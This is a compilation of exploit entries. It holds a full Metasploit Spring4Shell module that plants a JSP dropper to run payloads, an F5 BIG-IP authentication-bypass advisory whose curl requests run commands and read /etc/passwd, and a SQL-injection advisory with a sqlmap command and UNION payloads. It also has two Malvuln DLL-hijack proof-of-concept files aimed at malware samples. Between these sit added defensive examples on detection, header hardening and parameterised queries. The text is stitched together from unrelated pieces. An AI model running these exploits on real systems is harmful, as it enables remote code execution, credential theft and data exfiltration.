<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ManualRanking # It's going to manipulate the Class Loader<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',<br /> 'Description' => %q{<br /> Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above<br /> and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable<br /> to remote code execution due to an unsafe data binding used to populate an object from request parameters<br /> to set a Tomcat specific ClassLoader. 
By crafting a request to the application and referencing the<br /> org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:<br /> class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can<br /> gain remote code execution.<br /> },<br /> 'Author' => [<br /> 'vleminator <vleminator[at]gmail.com>'<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-22965'],<br /> ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],<br /> ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],<br /> ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']<br /> ],<br /> 'Platform' => %w[linux win],<br /> 'Payload' => {<br /> 'Space' => 5000,<br /> 'DisableNops' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Java',<br /> {<br /> 'Arch' => ARCH_JAVA,<br /> 'Platform' => %w[linux win]<br /> },<br /> ],<br /> [<br /> 'Linux',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Platform' => 'linux'<br /> }<br /> ],<br /> [<br /> 'Windows',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Platform' => 'win'<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-03-31',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'AKA' => ['Spring4Shell', 'SpringShell'],<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),<br /> OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),<br /> OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),<br /> ]<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [true, 'A 
directory where we can write files', '/tmp'])<br /> ]<br /> end<br /><br /> def jsp_dropper(file, exe)<br /> # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.<br /> dropper = <<~EOS<br /> <%@ page import=\"java.io.FileOutputStream\" %><br /> <%@ page import=\"java.util.Base64\" %><br /> <%@ page import=\"java.io.File\" %><br /> <%<br /> FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);<br /> oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));<br /> oFile.flush();<br /> oFile.close();<br /> File f = new File(\"#{file}\");<br /> f.setExecutable(true);<br /> Runtime.getRuntime().exec(\"#{file}\");<br /> %><br /> EOS<br /><br /> dropper<br /> end<br /><br /> def modify_class_loader(method, opts)<br /> cl_prefix = 'class.module.classLoader'<br /><br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path.to_s),<br /> 'version' => '1.1',<br /> 'method' => method,<br /> 'headers' => {<br /> 'c1' => '<%', # %{c1}i replacement in payload<br /> 'c2' => '%>' # %{c2}i replacement in payload<br /> },<br /> "vars_#{method == 'GET' ? 
'get' : 'post'}" => {<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]<br /> }<br /> })<br /> end<br /><br /> def check_log_file<br /> print_status("#{peer} - Waiting for the server to flush the logfile")<br /> print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}")<br /><br /> succeeded = retry_until_true(timeout: 60) do<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(@jsp_file)<br /> })<br /><br /> res&.code == 200 && !res.body.blank?<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded<br /><br /> print_good("#{peer} - Log file flushed")<br /> end<br /><br /> # Fix the JSP payload to make it valid once is dropped<br /> # to the log file<br /> def fix(jsp)<br /> output = ''<br /> jsp.each_line do |l|<br /> if l =~ /<%.*%>/<br /> output << l<br /> elsif l =~ /<%/<br /> next<br /> elsif l =~ /%>/<br /> next<br /> elsif l.chomp.empty?<br /> next<br /> else<br /> output << "<% #{l.chomp} %>"<br /> end<br /> end<br /> output<br /> end<br /><br /> def create_jsp<br /> jsp = <<~EOS<br /> <%<br /> File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");<br /> jsp.delete();<br /> %><br /> #{Faker::Internet.uuid}<br /> EOS<br /> if target['Arch'] == ARCH_JAVA<br /> jsp << fix(payload.encoded)<br /> else<br /> payload_exe = generate_payload_exe<br /> payload_filename = rand_text_alphanumeric(rand(4..7))<br /><br /> if target['Platform'] == 'win'<br /> payload_path = datastore['WritableDir'] + '\\' + 
payload_filename<br /> else<br /> payload_path = datastore['WritableDir'] + '/' + payload_filename<br /> end<br /><br /> jsp << jsp_dropper(payload_path, payload_exe)<br /> register_files_for_cleanup(payload_path)<br /> end<br /><br /> jsp<br /> end<br /><br /> def check<br /> @checkcode = _check<br /> end<br /><br /> def _check<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))<br /> )<br /><br /> return CheckCode::Unknown('Web server seems unresponsive') unless res<br /><br /> if res.headers.key?('Server')<br /> res.headers['Server'].match(%r{(.*)/([\d|.]+)$})<br /> else<br /> res.body.match(%r{Apache\s(.*)/([\d|.]+)})<br /> end<br /><br /> server = Regexp.last_match(1) || nil<br /> version = Rex::Version.new(Regexp.last_match(2)) || nil<br /><br /> return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)<br /><br /> vprint_status("Detected #{server} #{version} running")<br /><br /> if datastore['HTTP_METHOD'] == 'Automatic'<br /> # prefer POST over get to keep the vars out of the query string if possible<br /> methods = %w[POST GET]<br /> else<br /> methods = [ datastore['HTTP_METHOD'] ]<br /> end<br /><br /> methods.each do |method|<br /> vars = "vars_#{method == 'GET' ? 
'get' : 'post'}"<br /> res = send_request_cgi(<br /> 'method' => method,<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }<br /> )<br /><br /> # setting the default assertion status to a valid status<br /> send_request_cgi(<br /> 'method' => method,<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }<br /> )<br /> return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400<br /> end<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> prefix_jsp = rand_text_alphanumeric(rand(3..5))<br /> date_format = rand_text_numeric(rand(1..4))<br /> @jsp_file = prefix_jsp + date_format + '.jsp'<br /> http_method = datastore['HTTP_METHOD']<br /> if http_method == 'Automatic'<br /> # if the check was skipped but we need to automatically identify the method, we have to run it here<br /> @checkcode = check if @checkcode.nil?<br /> http_method = @checkcode.details[:method]<br /> fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?<br /><br /> print_good("Automatically identified HTTP method: #{http_method}")<br /> end<br /><br /> # if the check method ran automatically, add a short delay before continuing with exploitation<br /> sleep(5) if @checkcode<br /><br /> # Prepare the JSP<br /> print_status("#{peer} - Generating JSP...")<br /><br /> # rubocop:disable Style/FormatStringToken<br /> jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')<br /> # rubocop:enable Style/FormatStringToken<br /><br /> # Modify the Class Loader<br /> print_status("#{peer} - Modifying Class Loader...")<br /> properties = {<br /> payload: jsp,<br /> directory: datastore['PAYLOAD_PATH'],<br /> prefix: prefix_jsp,<br /> suffix: '.jsp',<br /> file_date_format: date_format<br /> }<br /> res = 
modify_class_loader(http_method, properties)<br /> unless res<br /> fail_with(Failure::TimeoutExpired, "#{peer} - No answer")<br /> end<br /><br /> # No matter what happened, try to 'restore' the Class Loader<br /> properties = {<br /> payload: '',<br /> directory: '',<br /> prefix: '',<br /> suffix: '',<br /> file_date_format: ''<br /> }<br /><br /> modify_class_loader(http_method, properties)<br /><br /> check_log_file<br /><br /> handler<br /> end<br /><br /> # Retry the block until it returns a truthy value. Each iteration attempt will<br /> # be performed with expoential backoff. If the timeout period surpasses, false is returned.<br /> def retry_until_true(timeout:)<br /> start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)<br /> ending_time = start_time + timeout<br /> retry_count = 0<br /> while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time<br /> result = yield<br /> return result if result<br /><br /> retry_count += 1<br /> remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)<br /> break if remaining_time_budget <= 0<br /><br /> delay = 2**retry_count<br /> if delay >= remaining_time_budget<br /> delay = remaining_time_budget<br /> vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")<br /> else<br /> vprint_status("Sleeping for #{delay} seconds before attempting again")<br /> end<br /><br /> sleep delay<br /> end<br /><br /> false<br /> end<br />end<br /></code></pre>
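Added detection example, not part of the Metasploit module above: it classifies one request's parameters and headers by the indicators the module produces, namely nested data binding through the bean's `class` object (after the fix only `class.name` stays bindable), writes to the AccessLogValve `pipeline.first.*` properties, and JSP delimiters or the `%{...}i` header placeholders used to smuggle them. The sample request is constructed to mirror what `modify_class_loader` sends, including the all-empty "restore" call, which is just as detectable.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Nested property binding through the bean's Class object; after the fix only 'class.name' stays reachable
CLASS_NESTED = re.compile(r"(?:^|\.)class\.(?!name(?:\.|$))", re.IGNORECASE)
# AccessLogValve properties the module sets through the Tomcat class loader
VALVE_PROP = re.compile(r"\.pipeline\.first\.(pattern|directory|prefix|suffix|fileDateFormat)$")
# JSP delimiters, and the %{header}i access-log placeholders the module uses to carry them
JSP_MARKER = re.compile(r"<%|%>|%\{[^}]+\}i")

# Constructed request body mirroring the module's properties hash (values are placeholders)
CL = "class.module.classLoader.resources.context.parent.pipeline.first"
SAMPLE_BODY = urlencode({
    CL + ".pattern": "%{c1}i out.println(\"constructed\"); %{c2}i",
    CL + ".directory": "webapps/ROOT",
    CL + ".prefix": "abc1",
    CL + ".suffix": ".jsp",
    CL + ".fileDateFormat": "7",
})
SAMPLE_HEADERS = {"c1": "<%", "c2": "%>"}


def inspect_request(method, path, headers, params):
    """Classify one request; params is the raw query string (GET) or form body (POST)."""
    kinds = set()
    detail = []
    for name, value in parse_qsl(params, keep_blank_values=True):   # blank values still bind
        if CLASS_NESTED.search(name):
            kinds.add("classloader_binding")
            detail.append(name)
        if VALVE_PROP.search(name):
            kinds.add("accesslog_write")
        if JSP_MARKER.search(value):
            kinds.add("jsp_marker_value")
    for hname, hvalue in headers.items():
        if JSP_MARKER.search(hvalue):
            kinds.add("jsp_marker_header")
            detail.append("header:" + hname)
    return {"method": method, "path": path, "kinds": sorted(kinds), "detail": detail}
```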
<pre><code># F5 BIG-IP RCE exploitation (CVE-2022-1388)<br /><br />POST (1): <br /><br />POST /mgmt/tm/util/bash HTTP/1.1<br />Host: <redacted>:8443<br />Authorization: Basic YWRtaW46<br />Connection: keep-alive, X-F5-Auth-Token<br />X-F5-Auth-Token: 0<br /><br />{"command": "run" , "utilCmdArgs": " -c 'id' " }<br /><br />curl command line: <br /><br />$ curl -i -s -k -X $'POST' \<br />-H $'Host: <redacted>:8443' \<br />-H $'Authorization: Basic YWRtaW46' \<br />-H $'Connection: keep-alive, X-F5-Auth-Token' \<br />-H $'X-F5-Auth-Token: 0' \<br />-H $'Content-Length: 52' \<br />--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \<br />$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080<br /><br /><br />POST (2):<br /><br />POST /mgmt/tm/util/bash HTTP/1.1<br />Host: <redacted>:8443<br />Authorization: Basic YWRtaW46<br />Connection: keep-alive, X-F5-Auth-Token<br />X-F5-Auth-Token: 0<br /><br />{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }<br /><br />curl command line:<br /><br />$ curl -i -s -k -X $'POST' \<br />-H $'Host: <redacted>:8443' \<br />-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \<br />-H $'X-F5-Auth-Token: 0' \<br />--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \<br />$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080<br /><br />Note: <br /><br />The issue may lie in the interaction between front-end and back-end ("Jetty") authentication: empty credentials ("admin: <empty>") combined with the header values above; see "HTTP hop_by_hop request headers" below.<br /><br />References and Fixes:<br />* https://support.f5.com/csp/article/K23605346<br />* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388<br /><br />Documentation used (latest notes):<br />* https://clouddocs.f5.com/api/icontrol-rest/ <br /><br />HTTP hop_by_hop request headers: <br />* 
https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open<br /><br /># Author<br />Alex Hernandez aka @_alt3kx_<br /></code></pre>
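<p>The note above points at the <code>Connection</code> header. RFC 7230 section 6.1 lets a sender list additional header names in <code>Connection</code>, and an intermediary is expected to remove those headers before forwarding. A front end that honours that blindly lets the client decide that an authentication header never reaches the back end, which then falls back on whatever else is in the request (here, Basic credentials with an empty password). The Python below is an added example written for this page; it is not code from the advisory and not F5's code, and whether this is the exact internal path on the affected product is an assumption taken from the note. It shows the textbook stripping rule beside a hardened rule that refuses to let a client declare an authentication header hop-by-hop, plus a check for empty Basic passwords. The header names in <code>PROTECTED</code> and the sample request are constructed for the example (the token header name and the Basic value are the ones shown in the advisory).</p>

```python
"""Hop-by-hop header handling at a front end: the naive rule beside a hardened one.

Added example; not the advisory's code and not the vendor's. Models the
generic RFC 7230 mechanism the note above points at and a rule that closes it.
"""
import base64

# Hop-by-hop by definition (RFC 7230 section 6.1); always removed before forwarding.
STANDARD_HOP_BY_HOP = {
    "connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
    "te", "trailer", "transfer-encoding", "upgrade",
}

# Headers the back end bases an authentication decision on. A client must not
# be allowed to declare these hop-by-hop. The set is an assumption for the
# example; the token header name is the one from the advisory.
PROTECTED = {"authorization", "x-f5-auth-token", "cookie"}


def connection_tokens(headers):
    """Names listed in the Connection header, lower-cased; empty set if absent."""
    for name, value in headers.items():
        if name.lower() == "connection":
            return {t.strip().lower() for t in value.split(",") if t.strip()}
    return set()


def forward_naive(headers):
    """What a textbook intermediary does: drop the standard hop-by-hop headers
    plus every header the client named in Connection, then forward the rest."""
    drop = STANDARD_HOP_BY_HOP | connection_tokens(headers)
    return {n: v for n, v in headers.items() if n.lower() not in drop}


def forward_hardened(headers):
    """Same stripping, but reject the request outright when Connection names a
    protected header. Returns (forwarded_headers, None) or (None, reason)."""
    offending = connection_tokens(headers) & PROTECTED
    if offending:
        return None, ("Connection header declares protected header(s) hop-by-hop: "
                      + ", ".join(sorted(offending)))
    return forward_naive(headers), None


def basic_auth_empty_password(headers):
    """True when an 'Authorization: Basic' value decodes to 'user:' with no
    password. The note observes empty credentials in the same request; a front
    end can reject those before any back-end fallback logic sees them."""
    for name, value in headers.items():
        if name.lower() == "authorization" and value.lower().startswith("basic "):
            try:
                raw = value.split(None, 1)[1]
                decoded = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
            except (ValueError, IndexError):
                return False
            _user, sep, password = decoded.partition(":")
            return sep == ":" and password == ""
    return False


# Constructed request headers in the shape of the advisory's POST (1).
SAMPLE = {
    "Host": "bigip.example:8443",
    "Authorization": "Basic YWRtaW46",        # decodes to "admin:"
    "Connection": "keep-alive, X-F5-Auth-Token",
    "X-F5-Auth-Token": "0",
    "Content-Type": "application/json",
}

if __name__ == "__main__":
    print("naive forwards:   ", forward_naive(SAMPLE))
    print("hardened verdict: ", forward_hardened(SAMPLE))
    print("empty password:   ", basic_auth_empty_password(SAMPLE))
```

<p>Run against the sample, the naive rule forwards <code>Authorization</code> but silently drops <code>X-F5-Auth-Token</code>, so the back end never sees the token it would have failed on; the hardened rule refuses the request, and the Basic check independently flags the empty password. Either check on its own is a useful WAF or reverse-proxy rule for the management interface.</p>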
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/d6751b148461e0f863548be84020b879.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: APT28 FancyBear<br />Vulnerability: Code Execution<br />Description: FancyBear looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vulnerable DLL load to execute our own code and to control and terminate the malware. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, it grabs its own process ID and terminates the process. We do not need to rely on a hash signature or a third-party product; the malware's own flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: FancyBear<br />Type: PE32<br />MD5: d6751b148461e0f863548be84020b879<br />Vuln ID: MVID-2022-0594<br />Disclosure: 05/09/2022<br />Video PoC URL: https://www.youtube.com/watch?v=8v2bqRX2AEU<br /><br />Exploit/PoC:<br />1) Compile the following C code as "winhttp.dll"<br />2) Place the DLL in the same directory as the malware<br />3) Optional - Hide it: attrib +s +h "winhttp.dll"<br />4) Run FancyBear<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Exploit FancyBear<br />//MD5: d6751b148461e0f863548be84020b879<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c winhttp.c -m32<br />//gcc -shared -o winhttp.dll winhttp.o -m32<br /><br />#include "string.h"<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBoxA(NULL, "Code Exec", "by malvuln", MB_OK);<br /> // Compare the current directory against System32, as described above;<br /> // anywhere else means a process loaded this copy from its own directory.<br /> char buf[MAX_PATH];<br /> GetCurrentDirectoryA(MAX_PATH, buf);<br /> int rc = strcmp("C:\\Windows\\System32", buf);<br /> if(rc != 0){<br /> // Terminate the host process (the malware) from inside its own address space<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: School Dormitory Management System - 'month' SQL Injection<br /># Date: 08/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br /># Vulnerable Code<br /><br />line 59 in file "/dms/admin/reports/daily_collection_report.php"<br /><br />$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");<br /><br /># Sqlmap command:<br /><br />sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: month (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 11 columns<br /> Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report<br /><br /><br /></code></pre>
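<p>The vulnerable line above concatenates <code>$month</code> straight into the SQL text, which is why the sqlmap output shows both a time-based and a UNION-based injection through it. The Python below is an added example written for this page, not code from the advisory or from the application; it mirrors the same query pattern against an in-memory SQLite database (the original is PHP/MySQL) and shows the string-built query beside its parameterised form, with an optional format check as defence in depth. The schema is a constructed two-table subset of the report query plus a <code>users</code> table standing in for whatever the real database holds; the sample rows, the <code>YYYY-MM</code> month format and the probe string are constructed for the example.</p>

```python
"""Vulnerable string-built query beside its parameterised form.

Added example; not the advisory's code and not the application's. Same SELECT
skeleton both ways; only the way the month value reaches the engine differs.
"""
import re
import sqlite3

_REPORT_SQL = (
    "SELECT p.id, p.month_of, p.amount, "
    "s.firstname || ' ' || s.lastname AS student "
    "FROM payment_list p JOIN student_list s ON p.student_id = s.id "
    "WHERE p.month_of = {month} ORDER BY student ASC"
)


def build_db() -> sqlite3.Connection:
    """Constructed sample data (not from the real application)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE student_list(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT);
        CREATE TABLE payment_list(id INTEGER PRIMARY KEY, student_id INTEGER,
                                  month_of TEXT, amount REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO student_list VALUES (1, 'Ada', 'Lovelace'), (2, 'Alan', 'Turing');
        INSERT INTO payment_list VALUES (1, 1, '2022-05', 120.0), (2, 2, '2022-05', 95.5),
                                        (3, 1, '2022-04', 120.0);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhash');
    """)
    return conn


def report_vulnerable(conn, month: str):
    """Mirrors the PHP: the value is pasted into the statement, so a quote in
    it ends the string literal and the rest is parsed as SQL."""
    sql = _REPORT_SQL.format(month="'" + month + "'")
    return conn.execute(sql).fetchall()


def report_fixed(conn, month: str):
    """Placeholder binding: the driver passes the value separately from the
    SQL text, so it can only ever be compared, never parsed."""
    sql = _REPORT_SQL.format(month="?")
    return conn.execute(sql, (month,)).fetchall()


_MONTH_RE = re.compile(r"^\d{4}-(0[1-9]|1[0-2])$")


def report_validated(conn, month: str):
    """Defence in depth on top of binding: reject anything that is not a
    YYYY-MM value before it reaches the database (format assumed here)."""
    if not _MONTH_RE.match(month):
        raise ValueError("month must be YYYY-MM")
    return report_fixed(conn, month)


# Constructed probe of the same shape as the UNION line in the sqlmap output:
# a quote closes the literal, UNION appends rows from another table, and a
# comment swallows the remainder of the original statement.
UNION_PROBE = "x' UNION ALL SELECT id, username, password_hash, 'x' FROM users-- -"

if __name__ == "__main__":
    db = build_db()
    print("legit, vulnerable:", report_vulnerable(db, "2022-05"))
    print("legit, fixed:     ", report_fixed(db, "2022-05"))
    print("probe, vulnerable:", report_vulnerable(db, UNION_PROBE))
    print("probe, fixed:     ", report_fixed(db, UNION_PROBE))
```

<p>For a legitimate month both functions return the same rows. For the probe, the string-built query returns the <code>users</code> row, while the bound query returns nothing because the whole probe is compared against <code>month_of</code> as a value. The PHP equivalent of <code>report_fixed</code> is a prepared statement (<code>$conn->prepare(...)</code> with <code>bind_param</code>) in place of the interpolated <code>'{$month}'</code>.</p>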
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/46bfd4f1d581d7c0121d2b19a005d3df.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Satana<br />Vulnerability: Code Execution<br />Description: Satana searches for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit DLL simply displays a Win32 API message box and calls exit(). The exploit DLL must export an "InterlockedExchange" function, or the load fails with an error. We do not need to rely on a hash signature or a third-party product; the malware's own flaw does the work for us. Endpoint protection systems and/or antivirus can potentially be killed prior to executing the malware, but this method cannot, as there is nothing to kill: the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Satana<br />Type: PE32<br />MD5: 46bfd4f1d581d7c0121d2b19a005d3df<br />Vuln ID: MVID-2022-0593<br />Disclosure: 05/07/2022<br />Video PoC URL: https://www.youtube.com/watch?v=AkuqcPZbah8<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows\System32<br />3) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln <br />//Purpose: Exploit Satana<br />//MD5: 46bfd4f1d581d7c0121d2b19a005d3df<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//DLL must live under Windows\System32 dir<br /><br />#include "stdlib.h"<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBoxA(NULL, "Code Exec", "by malvuln", MB_OK);<br /> // Ends the loading process (the malware) before it does any work<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />// Satana expects this export to be present; without it the DLL fails to load.<br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>